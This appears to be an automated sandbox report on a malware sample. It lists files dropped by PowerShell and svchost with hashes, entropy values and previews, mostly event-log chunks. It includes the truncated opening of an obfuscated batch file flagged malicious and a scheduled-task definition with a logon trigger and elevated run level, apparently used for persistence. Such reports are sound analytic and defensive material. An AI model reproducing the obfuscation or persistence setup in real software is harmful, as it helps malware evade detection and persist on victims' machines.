                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):432
                              Entropy (8bit):7.480712887814053
                              Encrypted:false
                              SSDEEP:12:JVea+/UK733LgMgw2r3LB661/pvZiEVSZIwKmqnD3iJyc:vea+cqLhgLrNPhpyKzD3cyc
                              MD5:BEEBE37780F9A6E06B953AE372CA93B8
                              SHA1:19E136F3CEE67E233590DDE57E676204E01037C9
                              SHA-256:39BDCB7198CB1E764660A9197B012EEE4C4D08D26CC77ECB07E64D062E7AA902
                              SHA-512:462207F3B9869ABBD65F86D1F5D12FAE796C763DE1E65437767919F0CFFBF0935C2A610C5B09F9755C0B1F17F1E577E0263761E9E97449D315E16973B4B1FA33
                              Malicious:false
                              Preview:.8...)....8.T.......di....O.m.O.....NL..j#6M.=..,p.2Y......2.=.......9.. A...;......y.{.X.......K..H...I..5...t..O$f.oOqW.Z.Yj#.F...!W..=.,).(....; 6%..E.....\.......!..4-...$N...).H.T.../.W../.Y.t..].4.u...h. g.WJ...G.a.".]......7!Z...L.B....i......-..2.A..3-45..........t.g...~*.@@......1......M2d..U0..._.,.wh........M..'.U.7.#M.......... ..].d...B.q.Ig...O.....T....L...S.......V.....<V..?.^
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:DOS batch file, ASCII text, with very long lines (5479), with CRLF line terminators
                              Category:dropped
                              Size (bytes):5285337
                              Entropy (8bit):6.008970376557102
                              Encrypted:false
                              SSDEEP:49152:SW2HHBORwlR4IStoWhlWSPH4HCIhUm9wfE+0yd8aWacLhMrdOe8f8:9
                              MD5:64D17CF4E56C0FDC93365EB17914CE39
                              SHA1:4861BE8BA1BA6D567F9950390F290BB8B860CCAE
                              SHA-256:7A83A44720D94BE24A8E7745D6871D65AFDA849C4008AB72511DD5AC38C7378C
                              SHA-512:A905DE2FDC70937B91584F24358766599F733E7204578B60F64E47D523696D93B14B8AEE3B1E5822B6EB0602A248C326C6305D96375F4069F7462CBD1EC4C21C
                              Malicious:true
                              Preview:@echo off..%^%@%COIlBAlHvUDRWINcSFZvWKuWZahIRAnNuSvgrVABydeUMpExUFwUaHASuLlBtCPUHQwenHKXeyWSFAkKvJOmdsNMrCLFJZhVnjmWSAjmUzPCKHnUBBfJODRocJMLWenfqaFwnnRVzCrDDlbJpReiUyhJrYUjNyqQmKlJ%%^%e%QGoKjjlmoKRHdweaekSTVeotIhbmBrTZsHykPyLoWxdncBKclQhztQhMsUbbiZLXRRpvYUkGzDWxbaqhxYaLjtGBzLSUwJgWMgwlloeqFBaQTJLrEUEjZZNxlOVmcpjPw%%^%c%KVEfViUJfItPHQaBqCeXXMtZawtRoprktTZQMzYwopUeevhflBYHKzdXCEezPcvPriwNQkORDIIISoUEonGNqKATQbohuzGmTeNWYtpbNhebRufnKAkCwIyHICXPW%%^%h%wecvONBYFVYEajFycvWaxUoePlGgnwwAfgKaZvGrMLUpDRIpbkABSViCPXFDhvKjyxyTyFyGPFoMaZAYCqedWUHkYikcPdjqaKQgtPRvLTMmGwBPwHaRqHnEQoVpuvQLwXLpjuENzJrciuDBGvFidratxmpeTBaqcaQIKmGbcmrHplvvKtJZ%%^%o%IIeXsSXeATYIbZhEVQuOEfQatelQUtASbAusLLstJWCstYnloQPCoklDSeDnGhkgtfGBFPSjyafHDyGuQaBdDXDRoRzHheNCMvYosLGyYFeoeEauyjxGFgCwBPnNplctnDUhzscetdfXTpMKQfjYHgWGSCMCySjMDLaAJSUfgsnCaECmdCWjceLgHopWGAGATsuip%%^% %aYkdRpTuFnZzzVVZKzZTTvDYzGLMIHkuXRCYYYmvnmJbWgaKEUIUivrEumDlDgMXdFCHtXaLnDFHMCctFbiNZpmBAYDMvbShALYrDtrHTWHFPKSSkkFBYYXNsahutoqmLyhaDKPlKBTdIHMP%%^%o%KCkvqjBOl
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Windows\System32\svchost.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3488
                              Entropy (8bit):3.5880169204751735
                              Encrypted:false
                              SSDEEP:48:yei1q97SQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCc0:thnkp2Gdi3ipVA9ll7EhAMz3cHtr+
                              MD5:A6B71EF585AB418697BC6AE8B5E12FDF
                              SHA1:E835D2F837EFCFC58D8D373AF69F3BCC1C179710
                              SHA-256:27C06B213153D0CA9735EBF96B0CCFF74B21541357E3036BD36DA863A56DE703
                              SHA-512:7C0F37399790064EA638A11B1A3B9EBCFB9F7C7E76196734A3720D69618EFF7528ED3139E50FF3B4CAFF073EE10362F0E577BDBCDAA42962A02C8F97C872BDB7
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.3.T.0.9.:.1.4.:.4.9...0.1.8.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.1.k.t.M.x.X.B.v.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):0.34726597513537405
                              Encrypted:false
                              SSDEEP:3:Nlll:Nll
                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                              Malicious:false
                              Preview:@...e...........................................................
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):68528
                              Entropy (8bit):4.184084540779949
                              Encrypted:false
                              SSDEEP:768:W2WOUWFWH2WoOAskFAc1bVCP5rAKP5feZ7IHoDsMMcAa5:Wn/tkSchMPuKPBU
                              MD5:9B223DDAC7D2FDC145ED88FAD996D67A
                              SHA1:BA8146CBC636F011AF6EC768B475DB75474FCB07
                              SHA-256:BA67377F7C72A9C194A1C9E2D477FA1928F89A2740DD6A81D098ABA05BF605C7
                              SHA-512:4B1E29AF54D0C7ED2EC6507C8E197A37CE8A29BCEF27638C02CD29E0510E22E659FAF7DE84769A747BCD62D40D0A8E7471E2EA9921737030F7026DDB4476DB15
                              Malicious:false
                              Preview:ElfChnk.................[.......`...........x...P...\.......................................................................M+@.............$...............................=...........................................................................................$...............................m...............F...........................t...................M...c...........................p...................................&...................................................................................**......^.......,..x..............&.....................................................................................!...d.............,..x............^..............w.)Cp...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.b.4.b.4.5.0.6.7.3...1.b.a.8...0.1.d.b.1.5.9.3.7.4.4.d.d.6.f.f...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):3.3165402716069035
                              Encrypted:false
                              SSDEEP:384:4he6UHi2uepX7xasnPC3FzFtpFDhFPFyF842v86:4VUHiapX7xadptrDT9W84H6
                              MD5:79D43237E9541804231BDCEB0F029FAC
                              SHA1:BDBEE2AF53978BA825F51F953782732DA615D233
                              SHA-256:D2C5BF38BE0746E6284234B17C4FA1D2BDAAD8B0F459C71036A0B97D17FC6ACB
                              SHA-512:DF8D9980E97EC3C1D06BE857891F1FF18CC016BBA5BB44186DD80DEEB067DCD51A27468348B40C423C8E5FF2E43EAE291D63CD72E4BA166A40F2A34A5584C6B7
                              Malicious:false
                              Preview:ElfChnk.........7...............7....................*.......................................................................!.&................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.377721629524822
                              Encrypted:false
                              SSDEEP:384:fhZN/GN6N/NDsNadNDtNkN6NQNQxNhdNQaNwNwNONPNavNqN6NfNjNALNCNyN7Ns:fZeIPRThtUmqYXL3QXr0Q7
                              MD5:B59AFB7FCA4C7067FBB3EF413064809B
                              SHA1:785A500AA8ADA1D59F3F7FD48E876F2305E7072D
                              SHA-256:ED35583D239B8BBF565E20C872268401F9D05A4DCCE4ABA7F83BA99A5978FD95
                              SHA-512:C86B8AE075AA4E669D9DE8EDC1C3E430D68F1A155153EE7B4C7B1898E03E42334C37FFAE7CD35B759EB019822762C7048083BEA711439FAA1D869360CE59CD88
                              Malicious:false
                              Preview:ElfChnk.{...............{..........................[.x......................................................................D.\........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................=c......................=j...........................?......]...............................................-g..................**......{.......n=.df..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.283865720656381
                              Encrypted:false
                              SSDEEP:384:/hMVnRVSV3V9VbVSV5VjVMV/V1VQVPTV0V6V6VoVbVaVVVlVlVmVTVwVgVAV1VKX:/+Hzi20Hl6Mun
                              MD5:6012EC738D51AC5E524C7E14B6A28686
                              SHA1:CF1638E2AFC42924B073BF15CFFB3186D904C055
                              SHA-256:86670BCE95654015946369BCA383D26F6E90F25D9D2E5869BD82CC8943980A37
                              SHA-512:CD782AFF747484F4637FC8C79D8E4C6FFC3BA421E4C100053CF6D199156F635C53EE69D3FFF497224AE6C1F2D426F7001FF4FE5FCF7A4D6C57444B67F08EB876
                              Malicious:false
                              Preview:ElfChnk......................................[..p]...%E^.....................................................................E:p................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................9@...............................=......**.. ..............f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.18944618600648
                              Encrypted:false
                              SSDEEP:384:Vhsmsmi7mRXZmVkWmhTimmdmBmKmPhmRTmimZ8mevmcsm7mrmQmzmjmvmTmmYmeX:V2klTiGFKX93WGUG+eOg26
                              MD5:12609E48B04709E16124C9593D728702
                              SHA1:60BC041C02B8E3CE4C557CA4C10CA988F2A9F26A
                              SHA-256:D848412FE5650AE73672918D451F9FB46551FC4FEE22B460535377E6B23300FD
                              SHA-512:90601C05EF8670C14E868A95D807CD4183E5C74E5E68619D446B3BFE101EFF5F44762681188F11CB65735E9D35B288C5AED10507818BAAE2D3C42E3FA48B3ADB
                              Malicious:false
                              Preview:ElfChnk.@-......o-......@-......o-..........(.......1..X.......................................................................................\...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................5...c#..{1..k:...................v..........**..x...@-......U.hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.4560337854416335
                              Encrypted:false
                              SSDEEP:96:MaNVaO8sMa3Z85ZMLkm3Z85ZP3Z85ZxJz4rjjeM3Z85Zu:MMV7pp8nMLkmp8nPp8nbMv/p8n
                              MD5:7C8AB6678FABF8B158E362756FE87E2B
                              SHA1:4B9DC22D6916FA4FB943B746E5CF457B7F93B5A8
                              SHA-256:E274BACC313944AD0BEB13500C4E7B4A93DE32C8896E550A44D6D1CB8CAB697C
                              SHA-512:21A294D4E9AF901022E75D0A685354059C2DB3C9FDDB245F807635B4CB25009809DBFFC86AB0972CACC81CCFE9FF3CCE8AD3D9C5BF76487BB9DC5AAF2EA89896
                              Malicious:false
                              Preview:ElfChnk.....................................@...............................................................................Y.j.............................................=...........................................................................................................................f...............?...................................p...........M...F...............................................f...................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.467947111655398
                              Encrypted:false
                              SSDEEP:1536:xZPZn2bBN2A4VD7VAx8whAGU2woJQghwMvOUFwe8OQhNwRA:
                              MD5:6B473E7917B1EDEE80CAFE7D24A6A4E8
                              SHA1:1940F41550F2986C928648ED00F9C6E4868D1A23
                              SHA-256:1D52F13D2EA4ACC472815240DBFF0F34C6CD5E86F980D04D9AD28E42C3E7A355
                              SHA-512:9AABAD5B7425A9692545864C11B99DDED0051CE8B442FFAB7BAB21DD8CD68B51BC980B01F324A81C685DC56793581AE2E6751DD08497CCBA64FB3339A9B5483D
                              Malicious:false
                              Preview:ElfChnk.e.......h.......e.......h...............x....;.......................................................................Z}............................................=...............y...........................................................................................................L...............?...............................................M...F...............................................&...................................................................................n...............**......e..........f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.565838744973026
                              Encrypted:false
                              SSDEEP:1536:PXY5nVYIyyqED5BVZUe39vHxt1BSocM1:PXY5nVYIyyqED5BVZUe39vHxt1BSot
                              MD5:B30C931B9EF047307E1443502CE7EE14
                              SHA1:BAC3632B709B853DFFCD9C4D65D1F9236F6FE551
                              SHA-256:033CF49641F4E76EFABF8F25753074E7EE72DD567FBA4145D446032D3D9CFADB
                              SHA-512:F5A9CA2D464EBA1F2F4EA426AC3864FB399A8951958BA44BA550E2129C4F4D4DA9E60F0D1B18A07CC76D4BC2CFD20D283F446A47DF990B52916113D5383A1952
                              Malicious:false
                              Preview:ElfChnk.........~...............~...................F..........................................................................T................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................N...............y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):2.436651632752671
                              Encrypted:false
                              SSDEEP:384:0hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorXorWorxFo8ormor8orF:0DCFF
                              MD5:5838F7481274DE6C603177C1A5C75477
                              SHA1:525967B7CFD3883803916780F576995065FB9434
                              SHA-256:545B8B8AE98E393520D453CE095CB4942BBAF575449ED11732E57298B9000A07
                              SHA-512:590AAE46EE3E30A2DBD52F5FFE49ABA5789E80F0578FC1E073AEAA30DA1CAB43E30E3A6D814389692D39E95B727DD91AB8AD52858E56C9F6506AE4172544E743
                              Malicious:false
                              Preview:ElfChnk.........3...............3............z...}..?..D....................................................................*.5.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/....... ......U)..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.8511209646626153
                              Encrypted:false
                              SSDEEP:384:ChAiPA5PNPxPEPHPhPEPmPSPRP3PoPbPfP0bPnPdP:C2NZ
                              MD5:A98C811B8E1B821CD1FE05A68ADD446A
                              SHA1:4E8B739F5E308F943962E72FF24212FFBE47FAD7
                              SHA-256:58F6584C100174B80ACB8940226841B77884326A293CEE9072F4DD4CF8C10133
                              SHA-512:24A7B9C86A6CE93B9B7F4107A433A247789EE568EB69E301B51DC9D01AA40D2F408AD76B78F7F83E5F4EB47C1677276BC86F86A99BAB95186C2331ABE4CA523C
                              Malicious:false
                              Preview:ElfChnk......................................%...&..?........................................................................<.m................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ..............'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.8431535491551847
                              Encrypted:false
                              SSDEEP:384:OhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:OWXSYieD+tvgzmMvRQAsNi
                              MD5:106F006ACA6287586EF71A10A5C06C4D
                              SHA1:B4B6D91FF53E9BDFC8D0D99A0D6F643E49074932
                              SHA-256:79E64A943AED80ADAE43934E4573F95AE7308DDD6FC896EEDDB386C8A41FBA65
                              SHA-512:F4D49C8CBC2B46719521935DFABDC3E05883C2360D4E472920C420B1ACC74D0F835D10A2C5BA6E29038425809D585025172FDC9E534619C017D70FA4D9F23D53
                              Malicious:false
                              Preview:ElfChnk......................................$...&..{n.8.....................................................................{..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):3.1699580099619564
                              Encrypted:false
                              SSDEEP:384:phqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28W:pbCyhLfIIj7
                              MD5:E6F79229DB689BB188915CF610A996AC
                              SHA1:4AAECBC591855D7956746CF94E1E3A0038098A56
                              SHA-256:DA8C32A3A138932F6B3389FBB9425116B99D8BB8C297DC7B56DFAA2E22F07ED8
                              SHA-512:A1147FAEADBE2A34AB0912D6C3635A7E79C8DD9C38266C6814DDF1F26007EA15E7F55DF44F379C8583BE728F5E7C1E5C54E1AF031FD63458CDD36AB203B3A136
                              Malicious:false
                              Preview:ElfChnk.........M...............M........... ...h.....\......................................................................2.l................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n................................................{......................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):3.345558376333852
                              Encrypted:false
                              SSDEEP:768:qcMhFBuyKskZljdoKXjtT/r18rQXn8BiJCF9Hhr:rMhFBuV
                              MD5:1FEB35D2E03E5CC80B9398DB36A42E0B
                              SHA1:7971AAE057B818A6AB163F31AE34636B0A83AEDB
                              SHA-256:894955C428CB4C9AE713EF1FFCE7554B296C83735EE3394DFF3A6D2C384DF078
                              SHA-512:6025B86C9B49A95A0342A3001B6B8CA66E8015905CF6F0FCEB1BDB56D5D124515E8B47537A4044EC9E121542E7C1A3F01D36CCEFF59F1728B3153C598BEEB5A6
                              Malicious:false
                              Preview:ElfChnk.........N...............N...........8........C.t.....................................................................h..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A.........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):4.894211292109946
                              Encrypted:false
                              SSDEEP:768:hGqQQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZavAFDtCwvhr9JXc:FHuz
                              MD5:C6D5477794C240DE679460A41111ED92
                              SHA1:AF6D2D21B4C79A0E04F985D02E4FAE14FB77A910
                              SHA-256:5B28E6EC41CDD53A8D507CC443E5A0FA6ECD3D36A30EFC9B6DF31C1DEF4E13AB
                              SHA-512:8B1A46E451454F82C8AFB0AEE44E5E2DE904A5A0A59A712D09299EB5FBF89EE5EE68C5AF8CCBCB65ED52F71A5A761108B228769D927A194EB5B716C0C5127117
                              Malicious:false
                              Preview:ElfChnk.v.......x.......v.......x...........P...`....\[.....................................................................m..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..@...v.......+...f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                              Process:C:\Windows\System32\svchost.exe
